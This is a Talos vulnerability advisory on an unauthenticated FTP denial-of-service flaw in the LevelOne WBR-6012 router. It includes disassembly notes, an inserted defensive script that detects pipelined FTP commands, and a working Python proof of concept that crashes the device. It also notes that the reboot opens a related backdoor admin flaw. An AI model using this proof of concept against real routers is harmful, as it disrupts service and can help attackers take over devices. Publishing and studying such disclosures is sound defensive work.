Talos Vulnerability Report

TALOS-2024-1998

LevelOne WBR-6012 FTP improper input validation vulnerability

October 30, 2024
CVE Number

CVE-2024-33700

SUMMARY

The LevelOne WBR-6012 router firmware R0.40e6 suffers from an input validation vulnerability within its FTP functionality, enabling attackers to cause a denial of service through a series of malformed FTP commands. This can lead to device reboots and service disruption.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

LevelOne WBR-6012 R0.40e6

PRODUCT URLS

WBR-6012 - https://us.level1.com/products/wbr-6012

CVSSv3 SCORE

7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-20 - Improper Input Validation

DETAILS

The WBR-6012 is a wireless SOHO router. It is a low-cost device which functions as an internet gateway for homes and small offices while aiming to be easy to configure and operate. In addition to providing a WiFi access point, the device serves as a 4-port wired router and implements a variety of common SOHO router capabilities such as port forwarding, quality-of-service, web-based administration, a DHCP server, a basic DMZ, and UPnP capabilities.

The LevelOne WBR-6012 fails to validate user input, allowing an attacker to reboot the device by sending a series of unauthenticated FTP inputs.

The main FTP function is located at 0x800c1a44 and handles command line input for several FTP commands. However, the device does not properly handle receiving input before it has sent the output of the previous command. For example, when sending an FTP command, a normal FTP client will wait for a response from the server before sending the next message. The device accounts for this scenario: receiving a command, parsing and processing it, sending an appropriate response message, and waiting for the next command.

However, if an attacker sends multiple messages before the device has completed the command-processing loop for the previous one, an unidentified error occurs, causing the device to crash and reboot. The FTP protocol uses a carriage return and newline to mark the end of a command, and this vulnerability can be triggered by sending any sequence of characters terminated by \r\n, including legitimate FTP commands, in quick succession. The TCP stream in such a scenario could resemble the following:

220 FTPd 1.6
AA 
500 Bad command
AA 
AA 
500 Bad command

Note that the third “AA\r\n” is sent before the response to the second one has been received. The device crashes and reboots at this point.
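The pattern described above (a client command arriving while the previous command is still unanswered) is easy to spot in a captured control-channel stream. The following is an added example written for this page, not code from the Talos report or from the device firmware: it reassembles a list of (direction, bytes) segments into CRLF-terminated lines, counts how many client commands are outstanding, and flags any command sent while a reply is still pending. It goes slightly beyond the exchange shown above in that it reassembles lines split across TCP segments and treats an FTP multi-line reply ("xyz-" ... "xyz ") as a single reply. The sample stream is constructed to mirror the exchange above and is not a real capture.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample stream mirroring the exchange above: each entry is
# (direction, bytes), with 'C' = client -> server and 'S' = server -> client.
# This is not a real capture from the device.
SAMPLE_STREAM: List[Tuple[str, bytes]] = [
    ("S", b"220 FTPd 1.6\r\n"),
    ("C", b"AA\r\n"),
    ("S", b"500 Bad command\r\n"),
    ("C", b"AA\r\n"),
    ("C", b"AA\r\n"),              # sent before the reply to the previous command
    ("S", b"500 Bad command\r\n"),
]

FINAL_REPLY = re.compile(rb"^(\d{3}) ")      # "xyz " terminates a reply
MULTILINE_START = re.compile(rb"^(\d{3})-")  # "xyz-" opens a multi-line reply


def find_pipelined_commands(stream: List[Tuple[str, bytes]]) -> List[int]:
    """Return the 1-based numbers of client commands that were sent while an
    earlier command was still awaiting a server reply.

    Segments are reassembled per direction and split on CRLF, so a command or
    reply split across TCP segments is handled. The server greeting (220) is
    consumed like any other reply but answers no command, so it does not
    change the outstanding count.
    """
    buffers: Dict[str, bytes] = {"C": b"", "S": b""}
    outstanding = 0            # commands sent but not yet answered
    command_no = 0
    multiline_code = None      # reply code of an open multi-line reply, if any
    flagged: List[int] = []

    for direction, data in stream:
        buffers[direction] += data
        while b"\r\n" in buffers[direction]:
            line, _, buffers[direction] = buffers[direction].partition(b"\r\n")
            if direction == "C":
                command_no += 1
                if outstanding > 0:
                    flagged.append(command_no)
                outstanding += 1
                continue

            # Server side: decide whether this line completes one reply.
            if multiline_code is not None:
                if not line.startswith(multiline_code + b" "):
                    continue   # still inside the multi-line reply
                multiline_code = None
            else:
                start = MULTILINE_START.match(line)
                if start:
                    multiline_code = start.group(1)
                    continue
                if not FINAL_REPLY.match(line):
                    continue   # not a reply line at all; ignore
            if outstanding > 0:
                outstanding -= 1
    return flagged


if __name__ == "__main__":
    print(find_pipelined_commands(SAMPLE_STREAM))  # [3]
```

Running it on the sample stream reports command 3, the one the text identifies as the trigger. A well-behaved client produces an empty list, so the same function can be run over reassembled FTP control sessions to find hosts probing this behaviour.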

Early in the main FTP function (0x800c20a0), a buffer is created and filled with received network data (0x800c1b14) at the top of the command-processing loop. Almost all of the FTP application’s logic exists within this loop.

recv_data_buffer 
800c1b14 21 28 c0 02        move       a1,s6
800c1b18 46 11 00 0c        jal        recv_data_get_buf_size undefined recv_data_get_buf_size(dword request, char * buffer, dword size)
800c1b1c bc 05 06 24        _li        a2,0x5bc

Near the end of the command-processing loop, at 0x800c2084, the output response message is moved into the a1 register before being passed to a send function.

800c2084 21 28 40 02        _move      a1=>s_500_Bad_command_80102560,output

The application then returns to the start of the loop. This sequence is a likely candidate for the root cause of the crash, but without debug access to the device we cannot say so with absolute certainty.

Exploit Proof of Concept

The PoC below sends a series of three unauthenticated FTP commands without waiting for a reply between them. This PoC is the simplest example, but any combination and sequence of CRLF-terminated inputs can result in a crash if sent in quick succession.

import socket

host = '192.168.1.1'    # device default LAN address
port = 21               # FTP control port

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.settimeout(1)
s.connect((host, port))
print(s.recv(1024))     # banner, e.g. "220 FTPd 1.6"

# Send three CRLF-terminated commands back to back, without waiting for
# the server's reply to each one. Any input terminated by \r\n works.
for i in range(3):
    s.sendall(b'AAA\r\n')

# The device normally crashes before answering; a timeout or an empty
# read here indicates it has gone down.
try:
    print(s.recv(1024))
except socket.timeout:
    print('no response - device is likely rebooting')
s.close()

The device will crash and do a “hard” reboot (allowing for backdoor admin access via TALOS-2024-1979).

TIMELINE

2024-06-03 - Vendor Disclosure
2024-08-05 - Status update request from TALOS - No reply
2024-09-03 - Status update request - Impending public release notification
2024-10-23 - Vendor notification of upcoming release date
2024-10-30 - Public Release

Credit

Discovered by Patrick DeSantis of Cisco Talos.